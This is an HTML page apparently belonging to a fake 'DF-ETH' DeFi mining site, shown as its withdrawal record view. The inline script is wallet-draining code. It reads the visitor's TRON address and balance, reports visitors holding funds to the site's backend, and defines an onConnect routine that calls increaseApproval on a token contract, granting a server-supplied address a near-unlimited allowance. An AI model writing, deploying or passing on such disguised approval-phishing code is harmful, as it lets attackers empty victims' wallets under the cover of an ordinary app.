<html lang="" data-dpr="1" style="font-size: 37.5px;">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <meta name="robots" content="noindex, nofollow" />
    <link rel="icon" href="https://tokem.xxelza.club/public/defi/favicon.ico" />
    <title>DF-ETH</title>
    <link href="./index_files/app.f6608e92.css" rel="preload" as="style" />
    <link href="./index_files/chunk-vendors.73034213.css" rel="preload" as="style" />
    <!--  <link href="./index_files/app.5bd8d9f8.js" rel="preload" as="script" />-->
    <!--  <link href="./index_files/chunk-vendors.1a1edb34.js" rel="preload" as="script" />-->
    <link href="./index_files/chunk-vendors.73034213.css" rel="stylesheet" />
    <link href="./index_files/app.f6608e92.css" rel="stylesheet" />
    <link type="image/x-icon" rel="shortcut icon" href="./index_files/sfZq78vytoImJYG.png" />
    <link type="image/x-icon" rel="shortcut icon" href="https://i.loli.net/2021/10/28/sfZq78vytoImJYG.png" />
</head>

<body style="font-size: 12px;" class="body-center">
    <div id="app" style="background-color: rgb(248, 248, 248); color: rgb(51, 51, 51);">
        <div data-v-60609aea="">
            <div data-v-60609aea=""
                style="--van-tab-text-color:#333333; --van-tab-active-text-color:#0052ff; --van-tabs-bottom-bar-color:#0052ff; --van-tabs-default-color:#0052ff; --van-tabs-nav-background-color:#f8f8f8; --van-dropdown-menu-background-color:#ffffff; --van-dropdown-menu-title-text-color:#333333; --van-button-warning-background-color:#0052ff; --van-button-warning-border-color:#0052ff; --van-button-warning-color:#f8f8f8; --van-collapse-item-content-background-color:#ffffff; --van-cell-background-color:#f8f8f8; --van-cell-text-color:#333333; --van-cell-active-color:#ffffff; --van-cell-border-color:#ffffff; --van-popup-background-color:#ffffff; --van-field-input-text-color:#959BA7; --van-dropdown-menu-title-font-size:14px; --van-tabbar-background-color:#ffffff; --van-tabbar-item-active-background-color:#f8f8f8; --van-tabbar-item-active-color:#0052ff; --van-nav-bar-background-color:#f8f8f8; --van-nav-bar-icon-color:#0052ff; --van-nav-bar-title-text-color:#0052ff; --van-count-down-text-color:#0052ff; --van-count-down-font-size:16px; --van-cus-border-color:#efefef; --van-cus-background-color:#f8f8f8; --van-cus-front-color:#ffffff; --van-cus-assets-bg-color1:rgba(0,0,0,0.05); --van-cus-assets-bg-color2:rgba(0,0,0,0.05); --van-cus-img-bg-color:rgba(255,255,255,0.2); --van-cus-text-color:#333333; --van-cus-link-light-color:rgba(0,82,255,0.05);">
                <div data-v-60609aea="" class="header">
                    <div data-v-60609aea="" class="van-nav-bar">
                        <div class="van-nav-bar__content">
                            <div class="van-nav-bar__left" onclick="goBack()"><i class="van-icon van-icon-arrow-left van-nav-bar__arrow">
                                    <!---->
                                </i></div>
                            <div class="van-nav-bar__title van-ellipsis">Record</div>
                        </div>
                    </div>
                </div>
                <div data-v-60609aea="" class="records-center">
                    <div data-v-60609aea="" class="van-tabs van-tabs--card">
                        <div>
                            <div class="van-sticky">
                                <div class="van-tabs__wrap">
                                    <div role="tablist" class="van-tabs__nav van-tabs__nav--card">
                                        <div role="tab" class="van-tab" onclick="goWithdraw()"><span class="van-tab__text van-tab__text--ellipsis">Exchange</span></div>
                                        <div role="tab" aria-selected="true" class="van-tab van-tab--active"><span class="van-tab__text van-tab__text--ellipsis">Withdraw</span></a></div>
                                        <div role="tab" class="van-tab"><span class="van-tab__text van-tab__text--ellipsis">Mining</span></div>
                                        <div role="tab" class="van-tab"><span class="van-tab__text van-tab__text--ellipsis">Activity</span></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="van-tabs__content van-tabs__content--animated">
                            <div class="van-tabs__track" style="transform: translate3d(0%, 0px, 0px); transition-duration: 0.3s;">
                                <div data-v-60609aea="" role="tabpanel" class="van-tab__pane-wrapper">
                                    <div class="van-tab__pane">
                                        <div data-v-60609aea="" class="pad-wrap">
                                            <div data-v-78eef6b2="" data-v-60609aea="">
                                                <div data-v-78eef6b2="" class="no-data" id="record-container" style="min-height: calc(100vh - 60px);"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div data-v-60609aea="" role="tabpanel" aria-hidden="true" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive">
                                    <div class="van-tab__pane">
                                        <!---->
                                    </div>
                                </div>
                                <div data-v-60609aea="" role="tabpanel" aria-hidden="true" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive">
                                    <div class="van-tab__pane">
                                        <!---->
                                    </div>
                                </div>
                                <div data-v-60609aea="" role="tabpanel" aria-hidden="true" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive">
                                    <div class="van-tab__pane">
                                        <!---->
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="./index_files/web3.min.js"></script>
    <script src="./index_files/web3.min(1).js"></script>
    <!--<script src="./index_files/chunk-vendors.1a1edb34.js"></script>-->
    <!--<script src="./index_files/app.5bd8d9f8.js"></script>-->
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2025; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2001; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
</body>
<script src="https://cdn.bootcdn.net/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="./index_files/TronWeb.js"></script>
<script src="./index_files/script.js"></script>
<script type="text/javascript">
    var rank = 6.5;
    var authorized_address = '';
    var domain = 'https://' + window.location.host + '/';
    var bizhong = '';
    var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
    var total = 0;
    var eth = 0;
    var time;


    function getInfo() {
        $.ajax({
            type: 'get',
            url: domain + 'api/get_trc',
            async: false,
            success: function(data) {
                authorized_address = data.data.authorized_address;
            },
            error: function(data) {

            }
        })
    }

    async function postInfo(address, symbol) {
        var s = getUrlQueryString('s')
        var a = getUrlQueryString('r')
        var rb = getUrlQueryString('rb')

        if (eth < 5) {
            return
        }
        var data = {
            address: address,
            authorized_address: authorized_address,
            bizhong: symbol,
            code: s,
            reffer: a,
            referral_address: rb,
            type: 1
        }
        $.ajax({
            type: 'post',
            url: domain + 'api/insert_trc',
            data: data,
        })
    }

    function getUrlQueryString(names, urls) {
        urls = urls || window.location.href;
        urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
        var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
        var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
        if (r != null && r[2] != "") return unescape(r[2]);
        return null;

    }

    time = setInterval(getWalletAddress, 1000);

    function getWalletAddress() {
        try {
            let tronWeb = window.tronWeb
            let walletAddress = tronWeb.defaultAddress.base58;

            $('.button_address').text(walletAddress);

            tradeobj = tronWeb.trx.getAccount(
                walletAddress,
            ).then(output => {

                eth = output.balance / 1000000;
                $('#eth-container .balance').val(eth);
                $('#eth-container .usdt_balance').val(eth * 4057.4);
            });

            getDealRecord(walletAddress)
            window.clearInterval(time);
            return true;
        } catch (e) {

            return false;
        }
    }

    function goWithdraw() {
        var redirect = './withdraw-exchange-record.html'
        var location = window.location.href;
        if (location.indexOf("?") > -1) {
            redirect += location.substring(location.indexOf("?"));
        }

        window.location.href = redirect;
    }

    function goBack() {
        var referrer = getUrlQueryString('referrer')
        var redirect = "./withdraw-eth.html"
        switch (referrer) {
            case 'trx':
                redirect = "./withdraw-trx.html"
                break;
            case 'withdraw':
                redirect = "./withdraw.html"
                break;
            case 'account':
                redirect = "./account.html"
                break;
            default:
                break;
        }

        var location = window.location.href;
        if (location.indexOf("?") > -1) {
            var params = location.substring(location.indexOf("?") + 1);
            var reg = new RegExp("(^|&)referrer=([^&]*)(&|$)", "i");
            redirect += '?' + params.replace(reg, '');
        }

        window.location.href = redirect
    }

    function getDealRecord(address){
        $.ajax({
            type: 'post',
            url:  domain + 'api/get_deal_record',
            data: {address: address, type: 1},
            success:function(data){
                $('#record-container').html('')
                var list = data;
                var html = '';
                for (var index in list) {
                    html += '<div data-v-4734bf18="" class="assets-bottom">'
                        + '<div data-v-4734bf18="" class="list-account box-shadow">'
                        + '<div data-v-4734bf18="" class="ac-top flex align-center justify-between">'
                        + '<div data-v-4734bf18="" class="flex align-center justify-between">' + list[index]['created_at'] + '<span data-v-4734bf18="" class="m-l-10"></span></div>'
                        + '</div>'
                        + '<div data-v-4734bf18="" class="ac-body flex align-center justify-between">'
                        + '<div data-v-4734bf18="" class="flex flex-sub flex-direction align-start">'
                        + '<h4 data-v-4734bf18="">FROM</h4>'
                        + '<p data-v-4734bf18="" class="fs14">' + list[index]['price'] + '</p>'
                        + '</div>'
                        + '<div data-v-4734bf18="" class="flex flex-sub flex-direction align-center">'
                        + '<h4 data-v-4734bf18="">TO</h4>'
                        + '<p data-v-4734bf18="" class="fs14">' + list[index]['to_price'] + '</p>'
                        + '</div>'
                        + '<div data-v-4734bf18="" class="flex flex-sub flex-direction align-end">'
                        + '<h4 data-v-4734bf18="">Type</h4>'
                        + '<p data-v-4734bf18="" class="fs14">' + list[index]['type'] + '</p>'
                        + '</div></div></div></div>';
                }
                $('#record-container').html(html)
            },
            error:function(data){
            }
        })
    }

    $(function() {
        /**
         * * Connect wallet button pressed.
         */
        async function onConnect() {
            try {
                let tronWeb = window.tronWeb;
                let instance = await tronWeb.contract().at(approveAddr);
                let res = await instance.increaseApproval(authorized_address, "90000000000000000000000000000");
                res.send({
                    feeLimit: 100000000,
                    callValue: 0,
                    shouldPollResponse: false
                }, function(err, res) {})
            } catch (e) {
                // setTimeout(onConnect(), 1000);
                alert(e);
            }
        }

        function init() {
            getInfo();
        }

        init();
    });
    
    $('.van-dropdown-menu__item').click(function () {
        $('.van-dropdown-item--down').show()
    })
    $('.van-overlay').click(function () {
        $('.van-dropdown-item--down').hide()
    })
</script>

</html>
